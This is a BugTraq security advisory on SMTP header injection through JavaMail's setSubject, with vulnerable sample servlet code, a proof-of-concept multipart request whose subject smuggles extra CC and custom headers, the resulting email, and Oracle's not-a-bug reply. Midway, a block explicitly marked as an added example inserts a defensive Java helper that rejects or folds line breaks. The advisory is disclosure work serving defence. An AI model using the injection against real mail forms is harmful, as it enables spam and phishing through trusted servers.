BugTraq
JavaMail SMTP Header Injection via method setSubject [CSNC-2014-001] May 19 2014 01:30PM
Alexandre Herzog (alexandre herzog csnc ch)
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: JavaMail
# Vendor: Oracle
# CSNC ID: CSNC-2014-001
# CVE ID: <none>
# Subject: SMTP Header Injection via method setSubject
# Risk: Medium
# Effect: Remotely exploitable
# Author: Alexandre Herzog <alexandre.herzog (at) csnc (dot) ch>
# Date: 19.05.2014
#
#############################################################

Introduction:
-------------
The JavaMail API provides a platform-independent and
protocol-independent framework to build mail and messaging applications.
The JavaMail API is available as an optional package for use with the
Java SE platform and is also included in the Java EE platform.[1]

JavaMail does not check whether the email subject contains a Carriage
Return (CR) or a Line Feed (LF) character. When the subject is taken
from a POST multipart request, such characters reach the application
verbatim, which allows the injection of arbitrary SMTP headers into the
generated email. This flaw can be used for sending SPAM or for other
social engineering attacks (e.g. abusing a trusted server to send HTML
emails with malicious content).

Affected:
---------
The following versions of JavaMail were tested and found vulnerable:
- 1.4.5 (included in the .war file used as demo from [2])
- 1.5.1 (latest version downloaded on 31.12.2013 from [3])

Technical Description
---------------------
The tests were performed using the .war file downloaded from [2]. That
code is an example of how to send a file by email using a JSP and a
servlet. The relevant parts of this example are:
[...]
/**
 * A utility class for sending e-mail message with attachment.
 * @author www.codejava.net
 *
 */
public class EmailUtility {

    /**
     * Sends an e-mail message from a SMTP host with a list of attached files.
     *
     */
    public static void sendEmailWithAttachment(String host, String port,
            final String userName, final String password, String toAddress,
            String subject, String message, List<File> attachedFiles)
            throws AddressException, MessagingException {
        // sets SMTP server properties
        Properties properties = new Properties();
        properties.put("mail.smtp.host", host);
        properties.put("mail.smtp.port", port);
        properties.put("mail.smtp.auth", "true");
        properties.put("mail.smtp.starttls.enable", "true");
        properties.put("mail.user", userName);
        properties.put("mail.password", password);

        // creates a new session with an authenticator
        Authenticator auth = new Authenticator() {
            public PasswordAuthentication getPasswordAuthentication() {
                return new PasswordAuthentication(userName, password);
            }
        };
        Session session = Session.getInstance(properties, auth);

        // creates a new e-mail message
        Message msg = new MimeMessage(session);

        msg.setFrom(new InternetAddress(userName));
        InternetAddress[] toAddresses = { new InternetAddress(toAddress) };
        msg.setRecipients(Message.RecipientType.TO, toAddresses);
==>     msg.setSubject(subject);   // no check for CR or LF characters in the subject
        msg.setSentDate(new Date());
[...]

[...]
/**
 * A servlet that takes message details from user and send it as a new e-mail
 * through an SMTP server. The e-mail message may contain attachments which
 * are the files uploaded from client.
 *
 * @author www.codejava.net
 *
 */
@WebServlet("/SendMailAttachServlet")
// CSNC comment - this tag enables the processing of POST multipart requests
@MultipartConfig(fileSizeThreshold = 1024 * 1024 * 2, // 2MB
                 maxFileSize = 1024 * 1024 * 10,      // 10MB
                 maxRequestSize = 1024 * 1024 * 50)   // 50MB
public class SendMailAttachServlet extends HttpServlet {
    private String host;
    private String port;
    private String user;
    private String pass;

    public void init() {
        // reads SMTP server setting from web.xml file
        ServletContext context = getServletContext();
        host = context.getInitParameter("host");
        port = context.getInitParameter("port");
        user = context.getInitParameter("user");
        pass = context.getInitParameter("pass");
    }

    /**
     * handles form submission
     */
    protected void doPost(HttpServletRequest request,
            HttpServletResponse response) throws ServletException, IOException {

        List<File> uploadedFiles = saveUploadedFiles(request);

        String recipient = request.getParameter("recipient");
==>     String subject = request.getParameter("subject");   // untrusted, passed on unchecked
        String content = request.getParameter("content");

        String resultMessage = "";

        try {
==>         EmailUtility.sendEmailWithAttachment(host, port, user, pass,
                    recipient, subject, content, uploadedFiles);

            resultMessage = "The e-mail was sent successfully";
        } catch (Exception ex) {
[...]

Below is a genuine POST request for the example above, sent with
"Content-Type: multipart" because it involves uploading a file:
POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1
Host: localhost:8080
[...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------205721274512326
Content-Length: 1785

-----------------------------205721274512326
Content-Disposition: form-data; name="recipient"

test@[redacted]
-----------------------------205721274512326
Content-Disposition: form-data; name="subject"

With javax.mail.1.5.1
-----------------------------205721274512326
Content-Disposition: form-data; name="content"

SMTP header injection test
-----------------------------205721274512326
Content-Disposition: form-data; name="file"; filename="NOTICE"
Content-Type: application/octet-stream

Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]


"Content-Type: multipart" allows us to submit a string containing a CR
or LF without having to encode them as the hex escapes %0A and %0D or as
\n and \r. In the JavaMail case, we abuse this property to inject
additional SMTP headers through the subject parameter of the request:
POST /EmailAttachWebApp/SendMailAttachServlet HTTP/1.1
Host: localhost:8080
[...]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------205721274512326
Content-Length: 1839

-----------------------------205721274512326
Content-Disposition: form-data; name="recipient"

test@[redacted]
-----------------------------205721274512326
Content-Disposition: form-data; name="subject"

With javax.mail.1.5.1
==> CC: injected.header@[redacted]
==> X-other-header: foo bar
-----------------------------205721274512326
Content-Disposition: form-data; name="content"

SMTP header injection test
-----------------------------205721274512326
Content-Disposition: form-data; name="file"; filename="NOTICE"
Content-Type: application/octet-stream

Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]

The email is sent successfully and is received by the recipient in the
following form, where the injected SMTP headers are clearly visible:
[...]
From: [redacted]@gmail.com
To: test@[redacted]
Message-ID: <52c2e778.01030e0a.7154.fffff0c2@mx.google.com>
Subject: With javax.mail.1.5.1
CC: injected.header@[redacted]
==> X-other-header: foo bar
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_Part_0_1681986934.1388504951836"
[...]

------=_Part_0_1681986934.1388504951836
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit

SMTP header injection test
------=_Part_0_1681986934.1388504951836
Content-Type: application/octet-stream; name=NOTICE
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename=NOTICE

Apache Tomcat
Copyright 1999-2012 The Apache Software Foundation
[...]

The same behavior can be observed when using JavaMail 1.4.5 (bundled by
default in the example .war [2]) instead of the latest 1.5.1 JavaMail
version.

Workaround / Fix:
-----------------
Ensure your application strictly follows the JavaMail API documentation
and guarantees that the subject string does not contain any line breaks
(as stated in some parts of the API [4]). An alternative would be to fix
the setSubject method of JavaMail itself, either by disallowing CR/LF
characters or by appending a space after each CR/LF so that the header
is folded in an RFC compliant way (see section 2.2.3 "Long Header
Fields" of RFC 2822 [5]).
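Added example (this code is not part of the advisory, of JavaMail, or of the codejava.net sample): a small helper implementing the two options described in the introduction and in this section, to be called on the untrusted subject before it reaches setSubject. The strict variant rejects any CR or LF; the lenient variant turns each line break into an RFC 2822 folded continuation (CRLF followed by a space, section 2.2.3), so that an injected "CC: ..." line stays inside the Subject value instead of becoming a header of its own. The class and method names (SubjectGuard, requireSingleLine, foldLineBreaks, setCheckedSubject) are assumptions chosen for this illustration.

```java
// Added example, not from the advisory, JavaMail or the codejava.net sample.
// Names of this class and its methods are assumptions for illustration only.
import javax.mail.Message;
import javax.mail.MessagingException;

public final class SubjectGuard {

    private SubjectGuard() {}

    /**
     * Strict variant: reject any subject containing a CR or LF character.
     * This is the guarantee the JavaMail documentation expects from the
     * caller and the safer default for a value read from an HTTP request.
     */
    public static String requireSingleLine(String subject) {
        if (subject == null) {
            throw new IllegalArgumentException("subject must not be null");
        }
        for (int i = 0; i < subject.length(); i++) {
            char c = subject.charAt(i);
            if (c == '\r' || c == '\n') {
                throw new IllegalArgumentException(
                    "subject must not contain line breaks (found at index " + i + ")");
            }
        }
        return subject;
    }

    /**
     * Lenient variant: keep the text but fold every line break as
     * CRLF + space (RFC 2822, 2.2.3). CRLF, a bare CR and a bare LF are all
     * treated as one break, so no unfolded line can start a new header.
     */
    public static String foldLineBreaks(String subject) {
        if (subject == null) {
            throw new IllegalArgumentException("subject must not be null");
        }
        StringBuilder out = new StringBuilder(subject.length() + 8);
        int i = 0;
        while (i < subject.length()) {
            char c = subject.charAt(i);
            if (c == '\r' || c == '\n') {
                // A CR directly followed by LF is a single break, not two.
                if (c == '\r' && i + 1 < subject.length()
                        && subject.charAt(i + 1) == '\n') {
                    i++;
                }
                out.append("\r\n ");
            } else {
                out.append(c);
            }
            i++;
        }
        return out.toString();
    }

    /**
     * How the strict check would sit in front of setSubject() in code such
     * as EmailUtility.sendEmailWithAttachment(): the untrusted value never
     * reaches the Message unless it is a single line.
     */
    public static void setCheckedSubject(Message msg, String untrustedSubject)
            throws MessagingException {
        msg.setSubject(requireSingleLine(untrustedSubject));
    }
}
```

With the subject from the second request above ("With javax.mail.1.5.1" followed by two injected lines), requireSingleLine throws and no mail is sent, while foldLineBreaks yields a three-line Subject whose continuation lines begin with a space and therefore unfold back into the subject text. Where a folded subject is not wanted, replacing each break with a single space is an equally safe simplification of the lenient variant.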

Oracle issued the following statement regarding this matter: "The
assessment from our engineering team is that this is not a bug in
JavaMail API. The application is responsible to perform some input
validation. In this particular case, the application is responsible for
ensuring that the subject string does not contain any line breaks. The
code demonstrating the issue is not an Oracle sample. Therefore, we are
closing the issue as not-a-bug."

Timeline:
---------
2014-05-19: Global publication of the advisory
2014-03-19: Advisory sent to Compass Security's customers
2014-02-19: Got confirmation from Oracle that they agree with our
publication schedule
2014-02-18: Informed Oracle that we plan to publish details of this
issue to our customers this week and to the general
public in a month
2014-02-05: Informed Oracle we consider publishing this information
2014-02-04: Response from Oracle: not considered a bug
2014-01-23: Status report from Oracle mentioning the case being
"Under investigation / Being fixed in main codeline"
2014-01-01: Reception acknowledgement from Oracle
2014-01-01: Sending advisory and PoC to Oracle
2014-01-01: Isolation and reproduction of an issue discovered
previously by the author

References:
-----------
[1] http://www.oracle.com/technetwork/java/javamail/index.html
[2] http://www.codejava.net/java-ee/jsp/send-attachments-with-e-mail-using-jsp-servlet-and-javamail
[3] https://java.net/projects/javamail/pages/Home
[4] https://javamail.java.net/nonav/docs/api/javax/mail/internet/MimeMessage.html#setSubject(java.lang.String)
[5] http://www.ietf.org/rfc/rfc2822.txt

--
Alexandre Herzog, CTO, Compass Security Schweiz AG
Werkstrasse 20, 8645 Jona, Switzerland
Schauplatzgasse 39, 3011 Bern, Switzerland
http://www.csnc.ch/
